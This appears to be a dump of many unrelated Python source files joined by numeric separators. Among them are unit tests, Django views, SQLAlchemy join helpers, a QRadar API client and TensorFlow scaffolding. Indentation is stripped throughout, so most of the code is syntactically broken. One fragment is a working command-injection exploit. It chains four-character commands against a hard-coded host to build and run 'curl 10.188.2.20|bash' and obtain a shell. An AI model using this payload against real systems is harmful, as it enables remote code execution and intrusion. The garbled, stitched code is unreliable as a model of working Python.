protofile = os.path.join(proto_path, proto)
# print(protofile)
os.startfile(protofile)
if __name__ == "__main__":
workPath = os.path.abspath('..')
binPath = workPath +"\\bin\\"
StartProgram.start(binPath, "MasterServer.exe")
StartProgram.start(binPath, "GateServer.exe")
StartProgram.start(binPath, "ChatServer.exe")
StartProgram.start(binPath, "MyClient.exe")
|
11546552
|
import unittest
from exporters.writers import MailWriter
from .utils import meta
import copy
class FakeMailWriter(MailWriter):
def __init__(self, *args, **kwargs):
self.send_called_number = 0
super(FakeMailWriter, self).__init__(*args, **kwargs)
def _write_mail(self, dump_path, group_key):
self.send_called_number += 1
WRITER_CONFIG = {
'emails': [],
'subject': 'test',
'from': 'test',
'access_key': 'test',
'secret_key': 'test'
}
class MailWriterTest(unittest.TestCase):
def get_writer_config(self, **kwargs):
config = copy.deepcopy(WRITER_CONFIG)
config.update(**kwargs)
return {'options': config}
def setUp(self):
self.batch_path = 'some_path'
def test_write_no_items(self):
writer_config = self.get_writer_config()
writer = FakeMailWriter(writer_config, meta())
writer.write(self.batch_path, [])
self.assertEqual(writer.send_called_number, 0)
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
self.assertEqual(writer.send_called_number, 1)
writer.close()
def test_file_name_none_compression(self):
writer_config = self.get_writer_config(file_name='some_file_', compression='none')
        print(writer_config)
writer = FakeMailWriter(
writer_config, meta())
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
self.assertEqual('some_file_0.jl', writer._get_file_name())
writer.close()
def test_file_name_default_compression(self):
writer_config = self.get_writer_config(file_name='some_file_')
        print(writer_config)
writer = FakeMailWriter(
writer_config, meta())
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
self.assertEqual('some_file_0.jl.gz', writer._get_file_name())
writer.close()
def test_file_name_bz2_compression(self):
writer_config = self.get_writer_config(file_name='some_file_', compression='bz2')
        print(writer_config)
writer = FakeMailWriter(
writer_config, meta())
writer.set_metadata('items_count', 1)
writer.write(self.batch_path, [])
self.assertEqual('some_file_0.jl.bz2', writer._get_file_name())
writer.close()
|
11546579
|
from django.views.generic import TemplateView
class SubmissionsView(TemplateView):
template_name = 'management/submissions.html'
class UserManagementView(TemplateView):
template_name = 'management/user_management.html'
|
11546605
|
import xarray as xr
def detect_dtype(aa):
    if isinstance(aa, xr.Dataset):
        dtype = aa[list(aa.data_vars)[0]].dtype
        print(
            "No `dtype` chosen. Input is Dataset. Defaults to %s" % dtype
        )
    elif isinstance(aa, xr.DataArray):
        dtype = aa.dtype
    else:
        raise TypeError(
            "Expected an xarray Dataset or DataArray, got %s" % type(aa)
        )
    return dtype
|
11546658
|
import paddle
from paddle.nn import Sigmoid
from paddle.nn import Tanh
from ppcls.arch.backbone.legendary_models.pp_lcnet import PPLCNet_x2_5
__all__ = ["PPLCNet_x2_5_Tanh"]
class TanhSuffix(paddle.nn.Layer):
def __init__(self, origin_layer):
super(TanhSuffix, self).__init__()
self.origin_layer = origin_layer
self.tanh = Tanh()
def forward(self, input, res_dict=None, **kwargs):
x = self.origin_layer(input)
x = self.tanh(x)
return x
def PPLCNet_x2_5_Tanh(pretrained=False, use_ssld=False, **kwargs):
def replace_function(origin_layer, pattern):
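        # Wrap the matched layer so its output is passed through a Tanh activation.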
new_layer = TanhSuffix(origin_layer)
return new_layer
pattern = "fc"
model = PPLCNet_x2_5(pretrained=pretrained, use_ssld=use_ssld, **kwargs)
model.upgrade_sublayer(pattern, replace_function)
return model
|
11546691
|
import requests
from time import sleep
from urllib import quote
payload = [
# generate "g> ht- sl" to file "v"
'>dir',
'>sl',
'>g\>',
'>ht-',
'*>v',
# reverse file "v" to file "x", content "ls -th >g"
'>rev',
'*v>x',
# generate "curl orange.tw|python;"
# generate "curl 10.188.2.20|bash"
'>\;\\',
'>sh\\',
'>ba\\',
'>\|\\',
'>20\\',
'>2.\\',
'>8.\\',
'>18\\',
'>0.\\',
'>1\\',
'>\ \\',
'>rl\\',
'>cu\\',
# got shell
'sh x',
'sh g',
]
r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
assert len(i) <= 4
r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
print i
sleep(0.1)
|
11546718
|
from .template_generators import GAFFTemplateGenerator, SMIRNOFFTemplateGenerator, EspalomaTemplateGenerator
from .system_generators import SystemGenerator
|
11546738
|
import unittest
from unittest.mock import Mock
import amaxa
from .MockFileStore import MockFileStore
class test_ExtractOperation(unittest.TestCase):
def test_execute_runs_all_steps(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
# pylint: disable=W0612
for i in range(3):
oc.add_step(Mock(sobjectname=str(i), errors=[]))
oc.execute()
for s in oc.steps:
s.execute.assert_called_once_with()
self.assertEqual(oc, s.context)
def test_execute_returns_on_error(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
# pylint: disable=W0612
for i in range(3):
oc.add_step(Mock(sobjectname=str(i), errors=[]))
oc.steps[1].errors = ["Bad things happened"]
assert oc.execute() == -1
oc.steps[0].execute.assert_called_once_with()
oc.steps[1].execute.assert_called_once_with()
oc.steps[2].execute.assert_not_called()
def test_add_dependency_tracks_dependencies(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
self.assertEqual(set(), oc.get_dependencies("Account"))
oc.add_dependency("Account", amaxa.SalesforceId("001000000000000"))
self.assertEqual(
set([amaxa.SalesforceId("001000000000000")]), oc.get_dependencies("Account")
)
def test_add_dependency_ignores_extracted_record(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(set(), oc.get_dependencies("Account"))
oc.add_dependency("Account", amaxa.SalesforceId("001000000000000"))
self.assertEqual(set(), oc.get_dependencies("Account"))
def test_store_result_retains_ids(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(
set([amaxa.SalesforceId("001000000000000")]), oc.extracted_ids["Account"]
)
def test_store_result_writes_records(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
def test_store_result_transforms_output(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
mapper_mock = Mock()
mapper_mock.transform_record = Mock(
return_value={"Id": "001000000000000", "Name": "<NAME>"}
)
oc.mappers["Account"] = mapper_mock
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
mapper_mock.transform_record.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
def test_store_result_clears_dependencies(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.add_dependency("Account", amaxa.SalesforceId("001000000000000"))
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(set(), oc.get_dependencies("Account"))
def test_store_result_does_not_write_duplicate_records(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_called_once_with(
{"Id": "001000000000000", "Name": "<NAME>"}
)
oc.file_store.get_csv("Account", amaxa.FileType.OUTPUT).writerow.reset_mock()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
oc.file_store.get_csv(
"Account", amaxa.FileType.OUTPUT
).writerow.assert_not_called()
def test_get_extracted_ids_returns_results(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.store_result("Account", {"Id": "001000000000000", "Name": "<NAME>"})
self.assertEqual(
set([amaxa.SalesforceId("001000000000000")]),
oc.get_extracted_ids("Account"),
)
def test_get_sobject_ids_for_reference_returns_correct_ids(self):
connection = Mock()
oc = amaxa.ExtractOperation(connection)
oc.file_store = MockFileStore()
oc.get_field_map = Mock(
return_value={"Lookup__c": {"referenceTo": ["Account", "Contact"]}}
)
oc.store_result(
"Account", {"Id": "001000000000000", "Name": "University of Caprica"}
)
oc.store_result("Contact", {"Id": "003000000000000", "Name": "<NAME>"})
oc.store_result(
"Opportunity", {"Id": "006000000000000", "Name": "Defense Mainframe"}
)
self.assertEqual(
set(
[
amaxa.SalesforceId("001000000000000"),
amaxa.SalesforceId("003000000000000"),
]
),
oc.get_sobject_ids_for_reference("Account", "Lookup__c"),
)
|
11546755
|
from marshmallow import Schema, fields
class LoginPostRequestSchema(Schema):
login = fields.Str()
password = fields.Str()
|
11546772
|
import subprocess
returned_text = subprocess.check_output("speedtest-cli", shell=True, universal_newlines=True)
print("The Result of Speed Test")
print(returned_text)
|
11546774
|
import logging
from abc import ABC
from platypush.plugins.camera.model.writer import VideoWriter
logger = logging.getLogger('platypush')
class PreviewWriter(VideoWriter, ABC):
"""
Abstract class for camera previews.
"""
class PreviewWriterFactory:
@staticmethod
def get(*args, **kwargs) -> PreviewWriter:
try:
import wx
# noinspection PyUnresolvedReferences
from platypush.plugins.camera.model.writer.preview.wx import WxPreviewWriter
return WxPreviewWriter(*args, **kwargs)
except ImportError:
logger.warning('wxPython not available, using ffplay as a fallback for camera previews')
from platypush.plugins.camera.model.writer.preview.ffplay import FFplayPreviewWriter
return FFplayPreviewWriter(*args, **kwargs)
# vim:sw=4:ts=4:et:
|
11546823
|
import sys
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
test = test.strip()
if len(test) == 0:
continue
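    # Find the shortest prefix whose removal via split/join empties the line,
    # i.e. the smallest repeating unit, and print its length.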
for i in range(1, len(test)+1):
sub_string = test[:i]
rejoined = "".join(test.split(sub_string))
if len(rejoined) == 0:
print(len(sub_string))
break
test_cases.close()
|
11546863
|
from django.contrib.auth.views import login, logout
from django.conf.urls import patterns, include, url
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from quora.core.views import (
fblogin,
home,
password,
picture,
profile,
public_profile,
settings,
)
from quora.search.views import search
from quora.profile.views import signup
admin.autodiscover()
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^$', home, name='home'),
url(r'^hidden_login', login, {'template_name': 'core/cover.html'}, name='login'),
url(r'^fblogin', fblogin, name='fblogin'),
url(r'^logout', logout, {'next_page': '/'}, name='logout'),
url(r'^signup/$', signup, name='signup'),
url(r'^public_profile/(?P<id>\d+)/$', public_profile, name='public_profile'),
url(r'^settings/$', settings, name='settings'),
url(r'^settings/profile/$', profile, name='profile'),
url(r'^settings/password/$', password, name='password'),
url(r'^questions/', include('quora.questions.urls')),
url(r'^search/$', search, name='search'),
url(r'^(?P<username>[^/]+)/$', profile, name='profile'),
url('', include('social.apps.django_app.urls', namespace='social')),
url('', include('django.contrib.auth.urls', namespace='auth')),
]
|
11546865
|
import json
import os
import shutil
import tarfile
import unittest
from unittest import mock
import yaml
from mir.commands.infer import CmdInfer
from mir.tools import settings as mir_settings, utils as mir_utils
from mir.tools.code import MirCode
from tests import utils as test_utils
class TestCmdInfer(unittest.TestCase):
# life cycle
def __init__(self, methodName: str = ...) -> None:
super().__init__(methodName=methodName)
self._test_root = test_utils.dir_test_root(self.id().split('.')[-3:])
self._mir_repo_root = os.path.join(self._test_root, 'mir-demo-repo')
self._models_location = os.path.join(self._test_root, 'models')
self._src_assets_root = os.path.join(self._test_root, 'assets') # source assets, index and infer config file
self._working_root = os.path.join(self._test_root, 'work') # work directory for cmd infer
self._config_file = os.path.join(self._test_root, 'config.yaml')
self._assets_index_file = os.path.join(self._src_assets_root, 'index.tsv')
def setUp(self) -> None:
self._prepare_dir()
self._prepare_mir_root()
self._prepare_assets()
self._prepare_model()
self._prepare_config_file()
self._prepare_infer_result_file()
return super().setUp()
def tearDown(self) -> None:
self._deprepare_dir()
return super().tearDown()
# protected: setup and teardown
def _prepare_dir(self):
os.makedirs(self._test_root, exist_ok=True)
os.makedirs(self._models_location, exist_ok=True)
os.makedirs(self._working_root, exist_ok=True)
os.makedirs(os.path.join(self._working_root, 'out'), exist_ok=True)
os.makedirs(self._src_assets_root, exist_ok=True)
def _deprepare_dir(self):
shutil.rmtree(self._test_root)
def _prepare_mir_root(self):
test_utils.mir_repo_init(self._mir_repo_root)
test_utils.prepare_labels(mir_root=self._mir_repo_root, names=['person', 'cat'])
def _prepare_assets(self):
test_assets_root = TestCmdInfer._test_assets_root()
shutil.copyfile(src=os.path.join(test_assets_root, '2007_000032.jpg'),
dst=os.path.join(self._working_root, '2007_000032.jpg'))
with open(self._assets_index_file, 'w') as f:
f.write(f'{self._working_root}/2007_000032.jpg\n')
def _prepare_model(self):
# model params
with open(os.path.join(self._models_location, 'model.params'), 'w') as f:
f.write('fake model params')
# model json
with open(os.path.join(self._models_location, 'model.json'), 'w') as f:
f.write('fake model json')
# model config
test_assets_root = TestCmdInfer._test_assets_root()
with open(os.path.join(test_assets_root, 'training-template.yaml'), 'r') as f:
training_config = yaml.safe_load(f.read())
training_config['anchors'] = '12, 16, 19, 36, 40, 28, 36, 75, 76, 55, 72, 146, 142, 110, 192, 243, 459, 401'
training_config['class_names'] = ['person', 'cat', 'unknown-car']
model_storage = mir_utils.ModelStorage(models=['model.params', 'model.json'],
executor_config=training_config,
task_context={
'src_revs': 'master',
'dst_rev': 'a'
})
with open(os.path.join(self._models_location, 'ymir-info.yaml'), 'w') as f:
yaml.dump(model_storage.as_dict(), f)
# pack model
with tarfile.open(os.path.join(self._models_location, 'fake_model_hash'), "w:gz") as dest_tar_gz:
dest_tar_gz.add(os.path.join(self._models_location, 'model.params'), 'model.params')
dest_tar_gz.add(os.path.join(self._models_location, 'model.json'), 'model.json')
dest_tar_gz.add(os.path.join(self._models_location, 'ymir-info.yaml'), 'ymir-info.yaml')
def _prepare_config_file(self):
test_assets_root = TestCmdInfer._test_assets_root()
# shutil.copyfile(src=os.path.join(test_assets_root, 'infer-template.yaml'), dst=self._config_file)
with open(os.path.join(test_assets_root, 'infer-template.yaml'), 'r') as f:
executor_config = yaml.safe_load(f)
with open(self._config_file, 'w') as f:
yaml.safe_dump({mir_settings.EXECUTOR_CONFIG_KEY: executor_config}, f)
def _prepare_infer_result_file(self):
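        # Fake detection output standing in for what the inference executor would write to the out directory.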
fake_infer_output_dict = {
'detection': {
'2007_000032.jpg': {
'annotations': [
{
'box': {
'x': 0,
'y': 0,
'w': 30,
'h': 30
},
'score': 0.5,
'class_name': 'cat',
},
],
},
},
}
infer_output_file = os.path.join(self._working_root, 'out', 'infer-result.json')
with open(infer_output_file, 'w') as f:
f.write(json.dumps(fake_infer_output_dict))
@staticmethod
def _test_assets_root() -> str:
return os.path.join(os.path.dirname(__file__), '..', 'assets')
# protected: mocked functions
def _mock_run_docker_cmd(*args, **kwargs):
pass
# public: test cases
@mock.patch('subprocess.run', side_effect=_mock_run_docker_cmd)
def test_00(self, mock_run):
fake_args = type('', (), {})()
fake_args.work_dir = self._working_root
fake_args.mir_root = self._mir_repo_root
fake_args.model_location = self._models_location
fake_args.model_hash = 'fake_model_hash'
fake_args.index_file = self._assets_index_file
fake_args.config_file = self._config_file
fake_args.executor = 'infer-executor:fake'
fake_args.executant_name = 'executor-instance'
cmd_instance = CmdInfer(fake_args)
cmd_result = cmd_instance.run()
# check running result
self.assertEqual(MirCode.RC_OK, cmd_result)
expected_cmd = ['nvidia-docker', 'run', '--rm']
expected_cmd.append(f"-v{fake_args.work_dir}:/in/assets:ro")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'in', 'models')}:/in/models:ro")
expected_cmd.append(
f"-v{os.path.join(fake_args.work_dir, 'in', 'candidate-index.tsv')}:/in/candidate-index.tsv")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'in', 'config.yaml')}:/in/config.yaml")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'in', 'env.yaml')}:/in/env.yaml")
expected_cmd.append(f"-v{os.path.join(fake_args.work_dir, 'out')}:/out")
expected_cmd.extend(['--user', f"{os.getuid()}:{os.getgid()}"])
expected_cmd.extend(['--name', fake_args.executant_name])
expected_cmd.append(fake_args.executor)
mock_run.assert_called_once_with(expected_cmd, check=True, stdout=mock.ANY, stderr=mock.ANY, text=True)
# check assets and index.tsv
with open(os.path.join(fake_args.work_dir, 'in', 'candidate-index.tsv'), 'r') as f:
contents = f.read().splitlines()
self.assertEqual(1, len(contents))
self.assertEqual('/in/assets/2007_000032.jpg', contents[0])
# check config
with open(os.path.join(fake_args.work_dir, 'in', 'config.yaml'), 'r') as f:
infer_config = yaml.safe_load(f.read())
self.assertTrue('class_names' in infer_config)
self.assertTrue('model_params_path' in infer_config)
# check model params
self.assertTrue(os.path.isfile(os.path.join(fake_args.work_dir, 'in', 'models', 'model.params')))
|
11546914
|
from kubernetes import client
from kubernetes.client.rest import ApiException
from .load_kube_config import kubeConfig
kubeConfig.load_kube_config()
core = client.CoreV1Api()
class K8sNameSpace:
    @staticmethod
    def get_ns(logger):
logger.info ("Fetching namespaces data...")
try:
ns_list = core.list_namespace(timeout_seconds=10)
return ns_list
except ApiException as e:
logger.warning("Exception when calling CoreV1Api->list_namespace: %s\n" % e)
|
11546926
|
import sqlalchemy as sa
from sqlalchemy.sql.util import ClauseAdapter
from .chained_join import chained_join # noqa
def path_to_relationships(path, cls):
relationships = []
for path_name in path.split('.'):
rel = getattr(cls, path_name)
relationships.append(rel)
cls = rel.mapper.class_
return relationships
def adapt_expr(expr, *selectables):
for selectable in selectables:
expr = ClauseAdapter(selectable).traverse(expr)
return expr
def inverse_join(selectable, left_alias, right_alias, relationship):
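    # Join the two aliases in the reverse direction of the relationship;
    # many-to-many relationships are routed through an aliased secondary (association) table.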
if relationship.property.secondary is not None:
secondary_alias = sa.alias(relationship.property.secondary)
return selectable.join(
secondary_alias,
adapt_expr(
relationship.property.secondaryjoin,
sa.inspect(left_alias).selectable,
secondary_alias
)
).join(
right_alias,
adapt_expr(
relationship.property.primaryjoin,
sa.inspect(right_alias).selectable,
secondary_alias
)
)
else:
join = sa.orm.join(right_alias, left_alias, relationship)
onclause = join.onclause
return selectable.join(right_alias, onclause)
def relationship_to_correlation(relationship, alias):
if relationship.property.secondary is not None:
return adapt_expr(
relationship.property.primaryjoin,
alias,
)
else:
return sa.orm.join(
relationship.parent,
alias,
relationship
).onclause
def chained_inverse_join(relationships, leaf_model):
selectable = sa.inspect(leaf_model).selectable
aliases = [leaf_model]
for index, relationship in enumerate(relationships[1:]):
aliases.append(sa.orm.aliased(relationship.mapper.class_))
selectable = inverse_join(
selectable,
aliases[index],
aliases[index + 1],
relationships[index]
)
if relationships[-1].property.secondary is not None:
secondary_alias = sa.alias(relationships[-1].property.secondary)
selectable = selectable.join(
secondary_alias,
adapt_expr(
relationships[-1].property.secondaryjoin,
secondary_alias,
sa.inspect(aliases[-1]).selectable
)
)
aliases.append(secondary_alias)
return selectable, aliases
def select_correlated_expression(
root_model,
expr,
path,
leaf_model,
from_obj=None,
order_by=None,
correlate=True
):
relationships = list(reversed(path_to_relationships(path, root_model)))
query = sa.select([expr])
selectable = sa.inspect(leaf_model).selectable
if order_by:
query = query.order_by(
*[adapt_expr(o, selectable) for o in order_by]
)
join_expr, aliases = chained_inverse_join(relationships, leaf_model)
condition = relationship_to_correlation(
relationships[-1],
aliases[-1]
)
if from_obj is not None:
condition = adapt_expr(condition, from_obj)
query = query.select_from(join_expr.selectable)
if correlate:
query = query.correlate(
from_obj if from_obj is not None else root_model
)
return query.where(condition)
|
11546928
|
from __future__ import annotations
from voluptuous.error import Invalid
from ..enums import HacsCategory, RepositoryFile
from ..repositories.base import HacsRepository
from ..repositories.integration import HacsIntegrationRepository
from ..utils.validate import INTEGRATION_MANIFEST_JSON_SCHEMA
from .base import ActionValidationBase, ValidationException
async def async_setup_validator(repository: HacsRepository) -> Validator:
"""Set up this validator."""
return Validator(repository=repository)
class Validator(ActionValidationBase):
"""Validate the repository."""
repository: HacsIntegrationRepository
more_info = "https://hacs.xyz/docs/publish/include#check-manifest"
categories = [HacsCategory.INTEGRATION]
async def async_validate(self):
"""Validate the repository."""
if RepositoryFile.MAINIFEST_JSON not in [x.filename for x in self.repository.tree]:
raise ValidationException(
f"The repository has no '{RepositoryFile.MAINIFEST_JSON}' file"
)
content = await self.repository.async_get_integration_manifest(self.repository.ref)
try:
INTEGRATION_MANIFEST_JSON_SCHEMA(content)
except Invalid as exception:
raise ValidationException(exception) from exception
|
11546935
|
import os
BULK_DB = os.path.join(__path__[0], 'bulks.db')
ADSORBATE_DB = os.path.join(__path__[0], 'adsorbates.db')
|
11546951
|
from uuid import uuid4
from django.utils.functional import cached_property
from wagtail.core.blocks import BaseStructBlock, Block
from ..exceptions import RemovedError
from ..widgets import BlockData
class NewBaseStructBlock(BaseStructBlock):
def __init__(self, local_blocks=None, **kwargs):
self._constructor_kwargs = kwargs
Block.__init__(self, **kwargs)
self.child_blocks = self.base_blocks.copy()
if local_blocks:
for name, block in local_blocks:
block.set_name(name)
self.child_blocks[name] = block
self.dependencies = self.child_blocks.values()
@cached_property
def definition(self):
definition = super(BaseStructBlock, self).definition
definition.update(
isStruct=True,
children=[child_block.definition
for child_block in self.child_blocks.values()],
)
html = self.get_instance_html({})
if html is not None:
definition['html'] = html
for child_definition in definition['children']:
if 'titleTemplate' in child_definition:
definition['titleTemplate'] = child_definition['titleTemplate']
break
return definition
def js_initializer(self):
raise RemovedError
def get_form_context(self, *args, **kwargs):
raise RemovedError
def render_form(self, *args, **kwargs):
raise RemovedError
def value_from_datadict(self, data, files, prefix):
return self._to_struct_value([
(child_block_data['type'],
self.child_blocks[child_block_data['type']].value_from_datadict(
child_block_data, files, prefix,
))
for child_block_data in data['value']
if child_block_data['type'] in self.child_blocks
])
def prepare_value(self, value, errors=None):
children_errors = self.get_children_errors(errors)
if children_errors is None:
children_errors = {}
prepared_value = []
for k, child_block in self.child_blocks.items():
child_errors = (None if children_errors is None
else children_errors.get(k))
child_value = value.get(k, child_block.get_default())
html = child_block.get_instance_html(child_value,
errors=child_errors)
child_value = BlockData({
'id': str(uuid4()),
'type': k,
'hasError': bool(child_errors),
'value': child_block.prepare_value(child_value,
errors=child_errors),
})
if html is not None:
child_value['html'] = html
prepared_value.append(child_value)
return prepared_value
def value_omitted_from_data(self, *args, **kwargs):
raise RemovedError
|
11546954
|
import hashlib
import os
import sys
from ruamel.yaml import YAML
from possum.config import logger
from possum.utils.general import hash_directory
def _possum_name():
cwd = os.getcwd()
return f'{os.path.split(cwd)[-1]}-' \
f'{hashlib.sha1(cwd.encode()).hexdigest()[-8:]}'
def get_possum_path(user_dir):
possum_dir = os.path.join(user_dir, '.possum')
if not os.path.exists(possum_dir):
logger.info('Creating Possum directory...')
os.mkdir(possum_dir)
elif not os.path.isdir(possum_dir):
logger.error(f"'{possum_dir}' is not a directory! Delete to "
"allow Possum to recreate the directory")
sys.exit(1)
return os.path.join(possum_dir, _possum_name())
class PossumFile(object):
def __init__(self, user_dir):
self.path = get_possum_path(user_dir)
try:
with open(self.path, 'r') as f_obj:
data = YAML().load(f_obj)
except FileNotFoundError:
data = {
'lastRun': dict(),
's3Uris': dict()
}
self._data = data
def save(self):
with open(self.path, 'w') as f_obj:
YAML().dump(self._data, f_obj)
def check_hash(self, func_name, source_dir):
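        # Return True when the directory hash matches the one stored from the last run;
        # otherwise record the new hash and return False.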
last_hash = self._data['lastRun'].get(func_name)
source_hash = hash_directory(source_dir)
if last_hash == source_hash:
return True
else:
self._data['lastRun'][func_name] = source_hash
return False
def get_last_s3_uri(self, func_name):
s3_uri = self._data['s3Uris'].get(func_name)
return s3_uri
def set_s3_uri(self, func_name, s3_uri):
self._data['s3Uris'][func_name] = s3_uri
|
11546957
|
from azureml.core import Workspace
subscription_id = 'subscription_id-stage'
resource_group = 'resource_group-stage'
workspace_name = 'workspace_name-stage'
try:
ws = Workspace(subscription_id = subscription_id, resource_group = resource_group, workspace_name = workspace_name)
ws.write_config()
print('Library configuration succeeded')
except Exception:
print('Workspace not found')
|
11546968
|
from hubspot import HubSpot
from hubspot.cms.site_search import PublicApi
def test_is_discoverable():
apis = HubSpot().cms.site_search
assert isinstance(apis.public_api, PublicApi)
|
11546981
|
from org.python.tests.RespectJavaAccessibility import Banana, Pear
p = Pear()
b = Banana()
assert b.amethod() == 'Banana.amethod()'
assert p.amethod() == 'Banana.amethod()'
assert b.amethod(1,2) == 'Banana.amethod(x,y)'
assert p.amethod(1,2) == 'Pear.amethod(x,y)'
assert b.privBanana() == 'Banana.privBanana()'
assert p.privPear() == 'Pear.privPear()'
assert b.protMethod() == 'Banana.protMethod()'
assert p.protMethod() == 'Banana.protMethod()'
assert b.protMethod(1,2) == 'Banana.protMethod(x,y)'
assert p.protMethod(1,2) == 'Pear.protMethod(x,y)'
|
11546994
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class BandwidthManager(QRadarAPIEndpoint):
"""
The QRadar API endpoint group /bandwidth_manager and its endpoints.
"""
__baseurl = 'bandwidth_manager/'
def __init__(self, url, header, verify):
super().__init__(urljoin(url, self.__baseurl),
header,
verify)
@header_vars('fields')
def post_configurations(self, *, configuration, fields=None, **kwargs):
"""
POST /bandwidth_manager/configurations
Creates a bandwidth manager configuration
"""
function_endpoint = urljoin(self._baseurl, 'configurations')
return self._call('POST', function_endpoint, json=configuration, **kwargs)
@header_vars('Range')
@request_vars('sort', 'filter', 'fields')
def get_configurations(self, *, sort=None, Range=None, filter=None, fields=None, **kwargs):
"""
GET /bandwidth_manager/configurations
Retrieves a list of configurations.
"""
function_endpoint = urljoin(self._baseurl, 'configurations')
return self._call('GET', function_endpoint, **kwargs)
def delete_configurations_by_id(self, id, **kwargs):
"""
DELETE /bandwidth_manager/configurations/{id}
Delete a bandwidth manager configuration by ID.
"""
function_endpoint = urljoin(self._baseurl, 'configurations/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@request_vars('fields')
def get_configurations_by_id(self, id, *, fields=None, **kwargs):
"""
GET /bandwidth_manager/configurations/{id}
Retrieves a configuration.
"""
function_endpoint = urljoin(self._baseurl, 'configurations/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_configurations_by_id(self, id, *, configuration, fields=None, **kwargs):
"""
POST /bandwidth_manager/configurations/{id}
Update a bandwidth manager configuration by ID.
"""
function_endpoint = urljoin(self._baseurl, 'configurations/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=configuration, **kwargs)
@header_vars('Range')
@request_vars('sort', 'filter', 'fields')
def get_filters(self, *, sort=None, Range=None, filter=None, fields=None, **kwargs):
"""
GET /bandwidth_manager/filters
Retrieves a list of egress filters.
"""
function_endpoint = urljoin(self._baseurl, 'filters')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_filters(self, *, _class, fields=None, **kwargs):
"""
POST /bandwidth_manager/filters
Creates a bandwidth manager filter
"""
function_endpoint = urljoin(self._baseurl, 'filters')
return self._call('POST', function_endpoint, json=_class, **kwargs)
@request_vars('fields')
def get_filters_by_id(self, id, *, fields=None, **kwargs):
"""
GET /bandwidth_manager/filters/{id}
Retrieves a filter.
"""
function_endpoint = urljoin(self._baseurl, 'filters/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_filters_by_id(self, id, *, filter, fields=None, **kwargs):
"""
POST /bandwidth_manager/filters/{id}
        Update a filter by ID.
"""
function_endpoint = urljoin(self._baseurl, 'filters/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=filter, **kwargs)
def delete_filters_by_id(self, id, **kwargs):
"""
DELETE /bandwidth_manager/filters/{id}
        Delete a filter by ID.
"""
function_endpoint = urljoin(self._baseurl, 'filters/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
|
11546999
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import argparse
import os
import inspect
import json
import random
from sharingan_base import *
def initRand():
seed = 0
tf.set_random_seed(seed)
np.random.seed(seed)
random.seed(seed)
def processArgs():
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="where to put output files")
parser.add_argument("--checkpoint", default=None, help="directory with checkpoint to resume training from or use for testing")
parser.add_argument("--max_steps", type=int, help="number of training steps (0 to disable)")
parser.add_argument("--max_epochs", type=int, help="number of training epochs")
parser.add_argument("--batch_size", type=int, default=1, help="number of images in batch")
parser.add_argument("--save_freq", type=int, default=1000, help="save frequency")
parser.add_argument("--summary_freq", type=int, default=1000, help="summary frequency")
parser.add_argument("--progress_freq", type=int, default=50, help="progress display frequency")
parser.add_argument("--lr", type=float, default=0.0002, help="learning rate")
parser.add_argument("--beta1", type=float, default=0.5, help="beta1")
parser.add_argument("--l1_weight", type=float, default=100.0, help="l1_weight")
parser.add_argument("--gan_weight", type=float, default=1.0, help="gan_weight")
parser.add_argument("--ngf", type=int, default=16, help="ngf")
parser.add_argument("--ndf", type=int, default=16, help="ndf")
parser.add_argument("--conv_std", type=float, default=0.001, help="conv_std")
parser.add_argument("--enable_quantization", action="store_true", help="True for tflite quantization")
a = parser.parse_args()
if not os.path.exists(a.output_dir):
